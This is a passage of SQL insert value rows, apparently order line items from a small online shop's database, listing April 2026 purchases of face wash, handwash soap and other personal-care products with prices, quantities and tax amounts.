(367, 997, '2026-04-11 22:16:38', '2026-04-11 22:16:38', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(368, 999, '2026-04-12 06:20:31', '2026-04-12 06:20:31', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(369, 1001, '2026-04-12 12:31:26', '2026-04-12 12:31:26', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(370, 1002, '2026-04-12 14:28:32', '2026-04-12 14:28:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(371, 1011, '2026-04-12 19:21:43', '2026-04-12 19:21:43', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(372, 1011, '2026-04-12 19:21:48', '2026-04-12 19:22:21', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, '2,3', NULL, 0, 0, 0.0000, 17.0000, 32.0000, 32.0000, NULL, 20.0000, 108.8000, 108.8000, 0.0000, 0.0000, 0.0000, 544.0000, 544.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 544.0000, 544.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(373, 1019, '2026-04-12 22:39:36', '2026-04-12 22:39:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(374, 1022, '2026-04-13 06:52:22', '2026-04-13 06:52:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(375, 1026, '2026-04-13 15:11:12', '2026-04-13 15:11:12', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(376, 1027, '2026-04-13 15:11:49', '2026-04-13 15:11:49', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(377, 1028, '2026-04-13 18:19:10', '2026-04-13 18:19:10', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(378, 1030, '2026-04-13 23:18:32', '2026-04-13 23:18:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(379, 1033, '2026-04-14 07:31:19', '2026-04-14 07:31:19', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(380, 1037, '2026-04-14 15:54:41', '2026-04-14 15:54:41', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(381, 1041, '2026-04-15 00:11:44', '2026-04-15 00:11:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(382, 1043, '2026-04-15 08:36:18', '2026-04-15 08:36:18', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(383, 1045, '2026-04-15 18:11:18', '2026-04-15 18:11:18', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(384, 1047, '2026-04-16 01:37:31', '2026-04-16 01:37:31', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(385, 1050, '2026-04-16 08:49:46', '2026-04-16 08:49:46', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(386, 1057, '2026-04-16 16:02:40', '2026-04-16 16:02:40', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(387, 1059, '2026-04-16 23:11:11', '2026-04-16 23:11:11', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(388, 1061, '2026-04-17 06:20:56', '2026-04-17 06:20:56', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(389, 1064, '2026-04-17 13:46:27', '2026-04-17 13:46:27', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(390, 1066, '2026-04-17 21:18:54', '2026-04-17 21:18:54', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(391, 1069, '2026-04-18 04:43:51', '2026-04-18 04:43:51', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(392, 1071, '2026-04-18 12:24:31', '2026-04-18 12:24:31', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(393, 1074, '2026-04-18 20:50:14', '2026-04-18 20:50:14', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(394, 1076, '2026-04-19 03:10:34', '2026-04-19 03:10:34', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(395, 1078, '2026-04-19 05:08:22', '2026-04-19 05:08:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(396, 1079, '2026-04-19 13:22:05', '2026-04-19 13:22:05', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(397, 1088, '2026-04-19 21:46:08', '2026-04-19 21:46:08', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(398, 1090, '2026-04-20 01:06:45', '2026-04-20 01:06:45', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(399, 1091, '2026-04-20 06:06:45', '2026-04-20 06:06:45', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(400, 1092, '2026-04-20 06:10:45', '2026-04-20 06:10:45', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(401, 1094, '2026-04-20 15:17:53', '2026-04-20 15:17:53', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(402, 1096, '2026-04-20 18:52:13', '2026-04-20 18:52:13', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(403, 1097, '2026-04-20 21:46:21', '2026-04-20 21:46:21', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(404, 1098, '2026-04-20 22:18:44', '2026-04-20 22:18:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(405, 1100, '2026-04-21 05:42:37', '2026-04-21 05:42:37', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(406, 1101, '2026-04-21 05:56:42', '2026-04-21 05:56:42', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(407, 1102, '2026-04-21 09:34:53', '2026-04-21 09:34:53', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(408, 1103, '2026-04-21 09:35:02', '2026-04-21 09:35:02', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(409, 1104, '2026-04-21 10:46:49', '2026-04-21 10:46:49', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(410, 1106, '2026-04-21 12:29:40', '2026-04-21 12:29:40', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(411, 1113, '2026-04-21 12:30:18', '2026-04-21 12:30:18', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(412, 1117, '2026-04-21 12:57:33', '2026-04-21 12:57:33', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(413, 1119, '2026-04-21 20:20:44', '2026-04-21 20:20:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(414, 1121, '2026-04-22 03:16:35', '2026-04-22 03:16:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(415, 1123, '2026-04-22 10:34:36', '2026-04-22 10:34:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(416, 1124, '2026-04-22 15:09:22', '2026-04-22 15:09:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(417, 1127, '2026-04-22 15:11:16', '2026-04-22 15:11:16', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(418, 1128, '2026-04-22 15:11:54', '2026-04-22 15:11:54', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
